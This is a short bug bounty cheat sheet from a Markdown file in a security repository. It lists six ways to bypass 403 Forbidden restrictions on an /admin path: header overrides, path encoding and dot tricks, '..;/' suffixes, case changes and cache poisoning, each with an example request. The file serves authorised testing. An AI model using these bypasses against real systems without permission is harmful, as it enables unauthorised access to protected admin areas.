AllAboutBugBounty/Bypass/Bypass 403.md

62 lines
963 B
Markdown
Raw Normal View History

# 403 Forbidden Bypass
1. Using "X-Original-URL" header
```
GET /admin HTTP/1.1
Host: target.com
```
Try this to bypass
```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
2. Appending **%2e** after the first slash
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/%2e/admin => 200
```
3. Try add dot (.) and slash (/) in the URL
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
```
4. Add "..;/" after the directory name
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/admin..;/
```
2020-09-09 14:56:10 +00:00
2020-09-17 15:55:57 +00:00
5. Try to uppercase the alphabet in the url
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/aDmIN
```
2021-02-08 11:35:49 +00:00
6. Via Web Cache Poisoning
```
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
```
2020-09-17 15:55:57 +00:00
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)